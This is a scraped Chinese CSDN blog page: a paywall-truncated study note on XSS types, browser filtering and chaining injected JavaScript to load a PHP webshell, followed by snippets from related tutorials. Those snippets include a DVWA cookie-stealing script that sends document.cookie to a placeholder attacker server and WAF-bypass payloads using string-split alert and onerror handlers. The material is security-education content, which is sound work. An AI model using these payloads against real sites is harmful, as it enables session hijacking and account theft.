20210410 web渗透学习之XSS的学习(不定期补充和更新)

已于 2022-04-24 18:56:48 修改
阅读量496 收藏
点赞数 1
分类专栏: WEB渗透学习 文章标签: web 安全
于 2021-04-11 01:47:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45290991/article/details/115586150
版权
本文详细介绍了XSS(跨站脚本)的三种类型及其区别,浏览器对XSS的防御机制,以及如何通过JavaScript加载PHP进行隐蔽攻击。还探讨了XSS平台搭建、绕过策略和常见攻击手段,包括使用不同标签、编码绕过、DOM型Hash利用等。
摘要由CSDN通过智能技术生成

 

 欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注

因为工作和学习中会不断遇到新的知识,为了避免重复制造轮子,所以这就是一个“记忆工厂”了。

一、三种XSS的小不同

反射型只能用一次,不会存在数据库里面。

DOM型查看源码看不到注入的恶意js语句,反射型和存储型可以。

二、浏览器不同会导致js语句被编码(所以测试的时候多换浏览器)

三、浏览器可以设置关闭XSS defender机制,该机制会防御xss

以IE为例:

四、火狐默认没法测DOM型XSS,会编码

五、通过js加载php的链式攻击手段(不会立刻在浏览器端回显,隐蔽攻击)

举个例子:

比方说我先写一个js,这个js能够加载恶意php木马,然后我用xss注入实现了这个js的执行,就会加载这

最低0.47元/天 解锁文章
热热的雨夜
关注
专栏目录
Dvwa靶机渗透教程-xss反射漏洞
imhacket0day的博客
08-25 1188
Dvwa靶机渗透教程-xss反射漏洞 简单: emmm…很明显…这里用'><script>alert(1)</script>试试 好的,确认有漏洞;接下来讲利用 '<script>window.location.href='http://服务器地址/?cookie='+document.cookie</script> 用这个获取受害者cookie并发回服务器 使用python2搭建简单web服务器: python2 -m SimpleHTTPServ
Web渗透XSS入门
m0_56632799的博客
12-27 184
Web渗透XSS入门
渗透学习-XSS-基础知识部分(持续更新中)
qq_43696276的博客
09-18 842
跨站脚本攻击(XSS)是客户端脚本安全中的头号大敌。OWASP TOP 10威胁多次吧XSS列在榜首。本文将接下来具体的探讨XSS攻击的原理,以及如何正确的防御它。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
渗透测试之XSS漏洞
追风筝的孩子
08-08 1017
         XSS是一种经常出现在Web应用中的计算机安全漏洞,它允许恶意Web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓...
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 481
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
WEB渗透学习笔记6——XSS漏洞
林林木林林L的博客
07-29 510
XSS——跨站脚本漏洞 跨站脚本(Cross-Site Scripting),简称为XSS或CSS或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可能得到很高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。可以用于钓鱼攻击,挂马,cookie获取,前端js挖矿等攻击行为,而且广泛适用于和其他漏洞结合,达到攻击服务器的目的 防范: 1.对所有不可信的输入数据进
XSS利用与挖掘-_更新版.rar_Exploit_XSS_XSS 利用_pkav_web exploit
09-23
**XSS(跨站脚本攻击)是一种常见的网络安全漏洞,主要出现在Web应用程序中。这种攻击方式允许攻击者通过注入恶意脚本到网页上,当用户访问这些被篡改的页面时,恶意脚本将在用户的浏览器中执行,可能导致敏感信息...
XSS学习大全
05-02
5. 保持更新:定期更新Web应用程序和服务器软件,修复已知的安全漏洞。 四、XSS学习资源 "XSS学习大全"压缩包可能包含了各种XSS攻击实例、漏洞分析、防御策略以及相关工具的教程。这些资料可以帮助你深入理解XSS的...
Web应用安全XSS安全隐患产生原因.pptx
06-18
Web应用安全领域中,XSS(Cross-Site Scripting,跨站脚本)是一种常见的安全隐患,它主要源于网站对用户输入的数据处理不当,允许恶意的JavaScript代码未经验证就嵌入到网页中,进而影响到访问该网页的用户。XSS...
PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie的学习等等)
最新发布
05-06
本压缩包提供的"PHP开发漏洞环境"是一个专门用于学习和研究这些安全问题的实践平台,包括SQL注入、文件上传、文件下载、XSS跨站脚本攻击、万能密码攻击以及session和cookie管理等多个方面。 1. SQL注入:这是一种...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2221
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
xss-labs 通关笔记
Ewige的博客
06-30 499
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
一次小破站JS代码审计出XSS漏洞思路学习
ElsonHY的博客
03-22 1569
一种挖掘xss的思路
xss绕过字符过滤_XSS小技巧绕过云WAF
weixin_39718521的博客
01-04 483
XSS小技巧绕过云WAF0x01最初发现来自实验室的小伙伴,但是仅限于弹窗,后来发现这种类型的payload构造思路来自WriteupXSS挑战第二期Writeup以及使用了fuzz的一些小技巧,可以实现任意js代码执行.绕云waf简单的方式就是绕过cdn,找真实ip,翻一下历史解析记录基本都能找到,也有一些工具,比如我在另一篇文章集的fuckcdn有些时候绕不过去cdn,又存在xss漏...
XSS-Lab(XSS注入笔记1-16)
小谢的博客
10-29 5041
XSS-Lab(XSS注入笔记1-16)
XSS漏洞(xss_and_mysql_file靶场实战)——渗透day10
qq_62716256的博客
09-07 2058
XSS漏洞(xss_and_mysql_file靶场实战)——day10
45. XSS篇——XSS过滤绕过技巧
热门推荐
Fly_鹏程万里
03-20 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
14.xss之alert绕过&cookie绕过
HWHXY的博客
12-25 4790
前言 该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。 XSS 特征 拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过 xss绕过 alert用top[‘ale’+‘rt’]绕过 alert()用top[‘ale’+‘rt’].call绕过 cookie用document[变量]绕过 最终payload <img src=\"x\" onerror=\"c='coo'+'kie';top['ale'+'rt'].c
Web安全渗透学习路径指南
1. 学习常见的Web漏洞,如XSS(跨站脚本)、CSRF(跨站请求伪造)、SQL注入、文件包含等,理解它们的工作原理和利用方式。 2. 理解OWASP(开放网络应用安全项目)的十大安全风险,并学习如何预防和检测这些风险。 3....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值